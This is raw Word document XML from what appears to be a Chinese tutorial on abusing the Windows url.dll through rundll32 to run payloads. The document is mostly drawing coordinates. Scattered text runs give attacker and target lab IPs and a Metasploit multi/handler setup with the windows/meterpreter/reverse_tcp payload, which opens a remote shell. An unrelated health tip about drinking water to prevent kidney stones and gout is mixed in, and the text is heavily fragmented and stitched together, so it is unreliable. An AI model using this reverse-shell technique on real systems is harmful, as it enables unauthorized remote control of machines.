4881,4949,14881,4948,14881,4946,14881,4945,14881,4944,14881,4943,14881,4941,14881,4940,14881,4939,14881,4937,14881,4936,14881,4934,14881,4933,14881,4931,14881,4930,14881,4928,14881,4926,14881,4925,14881,4923,14881,4921,14881,4919,14881,4917,14881,4915,14881,4913,14881,4911,14881,4909,14881,4907,14881,4905,14881,4903,14881,4901,14881,4899,14881,4896,14881,4894,14881,4892,14881,4889,14881,4887,14881,4884,14881,4882,14881,4879,14881,4876,14881,4874,14881,4871,14881,4868,14881,4865,14881,4862,14881,4859,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14881,4856,14880,4856,14880,4856,14880,4856,14880,4856,14880,4856,14879,4856,14879,4856,14879,4856,14879,4856,14878,4856,14878,4856,14877,4856,14877,4856,14877,4856,14876,4856,14876,4856,14875,4856,14874,4856,14874,4856,14873,4856,14873,4856,14872,4856,14871,4856,14870,4856,14869,4856,14869,4856,14868,4856,14867,4856,14866,4856,14865,4856,14864,4856,14863,4856,14861,4856,14860,4856,14859,4856,14858,4856,14856,4856,14855,4856,14853,4856,14852,4856,14850,4856,14849,4856,14847,4856,14845,4856,14844,4856,14842,4856,14840,4856,14838,4856,14836,4856,14834,4856,14832,4856,14830,4856,14827,4856,14825,4856,14823,4856,14820,4856,14818,4856,14815,4856,14812,4856,14810,4856,14807,4856,14804,4856,14801,4856,14798,4856,14795,4856,14792,4856,14789,4856,14785,4856,14782,4856,14778,4856,14775,4856,14771,4856,14767,4856,14764,4856,14760,4856,14756,4856,14752,4856,14748,4856,14743,4856,14739,4856,14735,4856,14730,4856,14726,4856,14721,4856,14716,4856,14711,4856,14706,4856,14701,4856,14696,4856,14691,4856,14685,4856,14680,4856,14674,4856,14669,4856,14663,4856,14657,4856,14651,4856,14645,4856,14639,4856,14633,4856,14626e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:312.874pt;margin-top:729.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6257,14597" coordsize="142,282">
        <v:shape style="position:absolute;left:6257;top:14597;width:142;height:282" coordorigin="6257,14597" coordsize="142,282" path="m6297,14626l6297,14626,6297,14626,6297,14626,6297,14626,6297,14626,6297,14626,6297,14626,6297,14626,6297,14626,6297,14626,6297,14626,6297,14626,6297,14626,6297,14626,6297,14626,6297,14626,6297,14626,6298,14626,6298,14626,6298,14626,6298,14626,6298,14626,6298,14626,6298,14626,6298,14626,6298,14626,6298,14626,6299,14626,6299,14626,6299,14626,6299,14626,6299,14626,6300,14626,6300,14626,6300,14626,6300,14626,6300,14626,6301,14626,6301,14626,6301,14626,6302,14626,6302,14626,6302,14626,6303,14626,6303,14626,6304,14626,6304,14626,6305,14626,6305,14626,6306,14626,6306,14626,6307,14626,6307,14626,6308,14626,6308,14626,6309,14626,6310,14626,6310,14626,6311,14626,6312,14626,6313,14626,6313,14626,6314,14626,6315,14626,6316,14626,6317,14626,6318,14626,6319,14626,6320,14626,6321,14626,6322,14626,6323,14626,6324,14626,6325,14626,6326,14626,6327,14626,6328,14626,6330,14626,6331,14626,6332,14626,6334,14626,6335,14626,6336,14626,6338,14626,6339,14626,6341,14626,6342,14626,6344,14626,6346,14626,6347,14626,6349,14626,6351,14626,6353,14626,6354,14626,6356,14626,6358,14626,6360,14626,6362,14626,6364,14626,6366,14626,6368,14626,6371,14626,6373,14626,6375,14626,6377,14626,6380,14626,6382,14626,6384,14626,6387,14626,6389,14626,6392,14626,6395,14626,6397,14626,6400,14626,6403,14626,6406,14626,6408,14626,6411,14626,6414,14626,6417,14626,6417,14626,6417,14626,6417,14626,6417,14626,6417,14626,6417,14626,6417,14626,6417,14626,6417,14626,6417,14626,6417,14627,6417,14627,6417,14627,6417,14627,6417,14627,6417,14627,6417,14627,6417,14627,6417,14627,6417,14627,6417,14628,6417,14628,6417,14628,6417,14628,6417,14628,6417,14629,6417,14629,6417,14629,6417,14630,6417,14630,6417,14630,6417,14631,6417,14631,6417,14632,6417,14632,6417,14633,6417,14633,6417,14634,6417,14635,6417,14635,6417,14636,6417,14637,6417,14638,6417,14638,6417,14639,6417,14640,6417,14641,6417,14642,6417,14643,6417,14644,6417,14645,6417,14646,6417,14648,6417,14649,6417,14650,6417,14652,6417,14653,6417,14654,6417,14656,6417,14657,6417,14659,6417,14661,6417,14662,6417,14664,6417,14666,6417,14668,6417,14670,6417,14672,6417,14674,6417,14676,6417,14678,6417,14681,6417,14683,6417,14685,6417,14688,6417,14690,6417,14693,6417,14695,6417,14698,6417,14701,6417,14704,6417,14707,6417,14710,6417,14713,6417,14716,6417,14719,6417,14723,6417,14726,6417,14730,6417,14733,6417,14737,6417,14740,6417,14744,6417,14748,6417,14752,6417,14756,6417,14760,6417,14765,6417,14769,6417,14773,6417,14778,6417,14782,6417,14787,6417,14792,6417,14797,6417,14802,6417,14807,6417,14812,6417,14817,6417,14822,6417,14828,6417,14833,6417,14839,6417,14845,6417,14851,6417,14857,6417,14863,6417,14869,6417,14875,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6417,14881,6416,14881,6416,14881,6416,14881,6416,14881,6416,14881,6416,14881,6416,14881,6415,14881,6415,14881,6415,14881,6415,14881,6415,14881,6414,14881,6414,14881,6414,14881,6414,14881,6413,14881,6413,14881,6413,14881,6412,14881,6412,14881,6412,14881,6411,14881,6411,14881,6410,14881,6410,14881,6409,14881,6409,14881,6408,14881,6408,14881,6407,14881,6407,14881,6406,14881,6405,14881,6405,14881,6404,14881,6403,14881,6403,14881,6402,14881,6401,14881,6400,14881,6399,14881,6399,14881,6398,14881,6397,14881,6396,14881,6395,14881,6394,14881,6393,14881,6392,14881,6391,14881,6390,14881,6388,14881,6387,14881,6386,14881,6385,14881,6383,14881,6382,14881,6381,14881,6379,14881,6378,14881,6376,14881,6375,14881,6373,14881,6372,14881,6370,14881,6369,14881,6367,14881,6365,14881,6364,14881,6362,14881,6360,14881,6358,14881,6356,14881,6354,14881,6352,14881,6350,14881,6348,14881,6346,14881,6344,14881,6342,14881,6339,14881,6337,14881,6335,14881,6332,14881,6330,14881,6327,14881,6325,14881,6322,14881,6320,14881,6317,14881,6314,14881,6312,14881,6309,14881,6306,14881,6303,14881,6300,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14881,6297,14880,6297,14880,6297,14880,6297,14880,6297,14880,6297,14879,6297,14879,6297,14879,6297,14879,6297,14878,6297,14878,6297,14877,6297,14877,6297,14877,6297,14876,6297,14876,6297,14875,6297,14874,6297,14874,6297,14873,6297,14873,6297,14872,6297,14871,6297,14870,6297,14869,6297,14869,6297,14868,6297,14867,6297,14866,6297,14865,6297,14864,6297,14863,6297,14861,6297,14860,6297,14859,6297,14858,6297,14856,6297,14855,6297,14853,6297,14852,6297,14850,6297,14849,6297,14847,6297,14845,6297,14844,6297,14842,6297,14840,6297,14838,6297,14836,6297,14834,6297,14832,6297,14830,6297,14827,6297,14825,6297,14823,6297,14820,6297,14818,6297,14815,6297,14812,6297,14810,6297,14807,6297,14804,6297,14801,6297,14798,6297,14795,6297,14792,6297,14789,6297,14785,6297,14782,6297,14778,6297,14775,6297,14771,6297,14767,6297,14764,6297,14760,6297,14756,6297,14752,6297,14748,6297,14743,6297,14739,6297,14735,6297,14730,6297,14726,6297,14721,6297,14716,6297,14711,6297,14706,6297,14701,6297,14696,6297,14691,6297,14685,6297,14680,6297,14674,6297,14669,6297,14663,6297,14657,6297,14651,6297,14645,6297,14639,6297,14633,6297,14626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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>请多喝点热水或者凉白开，可预防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>肾结石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，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通风</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等。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痛风可伴</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。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10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Url.d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ll简介：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url.dll是Interne</w:t>
      </w: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t快捷壳扩展相关应用程序接口系统文件。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223" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>说明：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url.dll所在路径已被系统添加P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ATH环境变量中，因此，url.dll命令可识别，但由于为</w:t>
      </w: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dll文件，需调用run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dll32.exe来执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr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2003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16"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>默认位置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:\Windows\System32\url.dll</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:\Windows\SysWOW64\url.dll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12"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7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默认位置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:\Windows\System32\url.dll</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:\Windows\SysWOW64\url.dll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4121"/>
        </w:tabs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9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击机：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192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:tab/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Debian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646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="7131" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> 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192.168.1.3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7</w:t>
      </w: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配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置攻击机msf：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="50" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="4911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dc4867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multi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handler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show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2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5151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Module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dc4867"/>
          <w:spacing w:val="6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multi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handler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4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2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Name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Current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Setting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Required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Description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4791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‐‐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‐‐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‐‐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‐‐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‐‐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‐‐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‐‐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‐‐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‐‐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7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="25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8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383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Payload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dc4867"/>
          <w:spacing w:val="5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windows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meterpreter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reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16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10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2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Name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Current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Setting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Required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Description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380.166pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,7603">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:7603" coordorigin="10402,0" coordsize="0,7603" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,6,10402,7,10402,9,10402,12,10402,15,10402,18,10402,22,10402,26,10402,30,10402,36,10402,41,10402,48,10402,54,10402,62,10402,70,10402,79,10402,88,10402,99,10402,110,10402,121,10402,134,10402,147,10402,162,10402,177,10402,193,10402,210,10402,228,10402,247,10402,267,10402,288,10402,310,10402,334,10402,358,10402,384,10402,411,10402,439,10402,468,10402,498,10402,530,10402,563,10402,598,10402,634,10402,671,10402,710,10402,750,10402,792,10402,835,10402,880,10402,926,10402,974,10402,1024,10402,1075,10402,1128,10402,1182,10402,1239,10402,1297,10402,1357,10402,1418,10402,1482,10402,1547,10402,1614,10402,1684,10402,1755,10402,1828,10402,1903,10402,1980,10402,2059,10402,2141,10402,2224,10402,2310,10402,2397,10402,2487,10402,2579,10402,2674,10402,2770,10402,2869,10402,2971,10402,3074,10402,3180,10402,3289,10402,3400,10402,3513,10402,3629,10402,3747,10402,3868,10402,3991,10402,4117,10402,4246,10402,4377,10402,4511,10402,4648,10402,4788,10402,4930,10402,5075,10402,5223,10402,5373,10402,5527,10402,5683,10402,5843,10402,6005,10402,6170,10402,6338,10402,6510,10402,6684,10402,6862,10402,7042,10402,7226,10402,7413,10402,7603e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:390" coordorigin="1490,970" coordsize="8990,390" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1002,10484,1003,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1006,10484,1006,10484,1007,10484,1008,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1016,10484,1017,10484,1018,10484,1020,10484,1021,10484,1023,10484,1024,10484,1026,10484,1027,10484,1029,10484,1031,10484,1033,10484,1035,10484,1037,10484,1039,10484,1041,10484,1043,10484,1045,10484,1048,10484,1050,10484,1053,10484,1055,10484,1058,10484,1061,10484,1064,10484,1066,10484,1070,10484,1073,10484,1076,10484,1079,10484,1083,10484,1086,10484,1090,10484,1093,10484,1097,10484,1101,10484,1105,10484,1109,10484,1113,10484,1118,10484,1122,10484,1127,10484,1131,10484,1136,10484,1141,10484,1146,10484,1151,10484,1156,10484,1162,10484,1167,10484,1173,10484,1179,10484,1184,10484,1190,10484,1196,10484,1203,10484,1209,10484,1216,10484,1222,10484,1229,10484,1236,10484,1243,10484,1250,10484,1257,10484,1265,10484,1272,10484,1280,10484,1288,10484,1296,10484,1304,10484,1312,10484,1321,10484,1329,10484,1338,10484,1347,10484,1356,10484,1365,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10483,1375,10482,1375,10482,1375,10480,1375,10479,1375,10477,1375,10475,1375,10473,1375,10470,1375,10466,1375,10462,1375,10458,1375,10453,1375,10448,1375,10442,1375,10435,1375,10428,1375,10419,1375,10411,1375,10401,1375,10391,1375,10379,1375,10367,1375,10354,1375,10340,1375,10326,1375,10310,1375,10293,1375,10275,1375,10256,1375,10236,1375,10215,1375,10192,1375,10168,1375,10143,1375,10117,1375,10090,1375,10061,1375,10031,1375,9999,1375,9966,1375,9931,1375,9895,1375,9858,1375,9819,1375,9778,1375,9735,1375,9691,1375,9646,1375,9598,1375,9549,1375,9498,1375,9445,1375,9391,1375,9334,1375,9275,1375,9215,1375,9153,1375,9088,1375,9022,1375,8953,1375,8883,1375,8810,1375,8735,1375,8658,1375,8578,1375,8497,1375,8413,1375,8326,1375,8238,1375,8146,1375,8053,1375,7957,1375,7859,1375,7758,1375,7654,1375,7548,1375,7439,1375,7328,1375,7214,1375,7097,1375,6977,1375,6855,1375,6730,1375,6602,1375,6471,1375,6337,1375,6201,1375,6061,1375,5918,1375,5773,1375,5624,1375,5472,1375,5317,1375,5159,1375,4997,1375,4833,1375,4665,1375,4494,1375,4319,1375,4141,1375,3960,1375,3776,1375,3587,1375,3396,1375,3201,1375,3002,1375,2800,1375,2594,1375,2385,1375,2172,1375,1955,1375,1734,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1373,1510,1373,1510,1373,1510,1373,1510,1372,1510,1372,1510,1372,1510,1371,1510,1371,1510,1370,1510,1370,1510,1369,1510,1369,1510,1368,1510,1367,1510,1367,1510,1366,1510,1365,1510,1364,1510,1363,1510,1362,1510,1361,1510,1360,1510,1359,1510,1358,1510,1357,1510,1356,1510,1354,1510,1353,1510,1352,1510,1350,1510,1348,1510,1347,1510,1345,1510,1343,1510,1342,1510,1340,1510,1338,1510,1336,1510,1333,1510,1331,1510,1329,1510,1327,1510,1324,1510,1322,1510,1319,1510,1316,1510,1314,1510,1311,1510,1308,1510,1305,1510,1302,1510,1298,1510,1295,1510,1292,1510,1288,1510,1284,1510,1281,1510,1277,1510,1273,1510,1269,1510,1265,1510,1261,1510,1256,1510,1252,1510,1247,1510,1243,1510,1238,1510,1233,1510,1228,1510,1223,1510,1218,1510,1212,1510,1207,1510,1201,1510,1196,1510,1190,1510,1184,1510,1178,1510,1171,1510,1165,1510,1159,1510,1152,1510,1145,1510,1138,1510,1131,1510,1124,1510,1117,1510,1110,1510,1102,1510,1094,1510,1086,1510,1078,1510,1070,1510,1062,1510,1053,1510,1045,1510,1036,1510,1027,1510,1018,1510,1009,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:390" coordorigin="1490,990" coordsize="30,390" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1002,1517,1003,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1006,1517,1006,1517,1007,1517,1008,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1014,1517,1015,1517,1016,1517,1017,1517,1018,1517,1020,1517,1021,1517,1023,1517,1024,1517,1026,1517,1027,1517,1029,1517,1031,1517,1033,1517,1035,1517,1037,1517,1039,1517,1041,1517,1043,1517,1045,1517,1048,1517,1050,1517,1053,1517,1055,1517,1058,1517,1061,1517,1064,1517,1066,1517,1070,1517,1073,1517,1076,1517,1079,1517,1083,1517,1086,1517,1090,1517,1093,1517,1097,1517,1101,1517,1105,1517,1109,1517,1113,1517,1118,1517,1122,1517,1127,1517,1131,1517,1136,1517,1141,1517,1146,1517,1151,1517,1156,1517,1162,1517,1167,1517,1173,1517,1179,1517,1184,1517,1190,1517,1196,1517,1203,1517,1209,1517,1216,1517,1222,1517,1229,1517,1236,1517,1243,1517,1250,1517,1257,1517,1265,1517,1272,1517,1280,1517,1288,1517,1296,1517,1304,1517,1312,1517,1321,1517,1329,1517,1338,1517,1347,1517,1356,1517,1365,1517,1375e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:67.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1350" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:1350;width:8990;height:650" coordorigin="1490,1350" coordsize="8990,650" path="m1510,1375l1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1511,1375,1512,1375,1512,1375,1514,1375,1515,1375,1517,1375,1519,1375,1521,1375,1524,1375,1528,1375,1532,1375,1536,1375,1541,1375,1546,1375,1552,1375,1559,1375,1566,1375,1575,1375,1583,1375,1593,1375,1603,1375,1615,1375,1627,1375,1640,1375,1654,1375,1668,1375,1684,1375,1701,1375,1719,1375,1738,1375,1758,1375,1780,1375,1802,1375,1826,1375,1851,1375,1877,1375,1904,1375,1933,1375,1963,1375,1995,1375,2028,1375,2063,1375,2099,1375,2136,1375,2175,1375,2216,1375,2259,1375,2303,1375,2348,1375,2396,1375,2445,1375,2496,1375,2549,1375,2604,1375,2660,1375,2719,1375,2779,1375,2841,1375,2906,1375,2972,1375,3041,1375,3112,1375,3184,1375,3259,1375,3336,1375,3416,1375,3498,1375,3582,1375,3668,1375,3757,1375,3848,1375,3941,1375,4037,1375,4136,1375,4236,1375,4340,1375,4446,1375,4555,1375,4666,1375,4780,1375,4897,1375,5017,1375,5139,1375,5264,1375,5392,1375,5523,1375,5657,1375,5793,1375,5933,1375,6076,1375,6222,1375,6370,1375,6522,1375,6677,1375,6835,1375,6997,1375,7161,1375,7329,1375,7500,1375,7675,1375,7853,1375,8034,1375,8219,1375,8407,1375,8598,1375,8793,1375,8992,1375,9194,1375,9400,1375,9609,1375,9823,1375,10039,1375,10260,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1376,10484,1376,10484,1376,10484,1376,10484,1377,10484,1377,10484,1377,10484,1378,10484,1378,10484,1379,10484,1379,10484,1380,10484,1381,10484,1381,10484,1382,10484,1383,10484,1384,10484,1385,10484,1386,10484,1387,10484,1388,10484,1389,10484,1391,10484,1392,10484,1394,10484,1395,10484,1397,10484,1399,10484,1400,10484,1402,10484,1404,10484,1407,10484,1409,10484,1411,10484,1414,10484,1416,10484,1419,10484,1421,10484,1424,10484,1427,10484,1430,10484,1434,10484,1437,10484,1440,10484,1444,10484,1448,10484,1452,10484,1455,10484,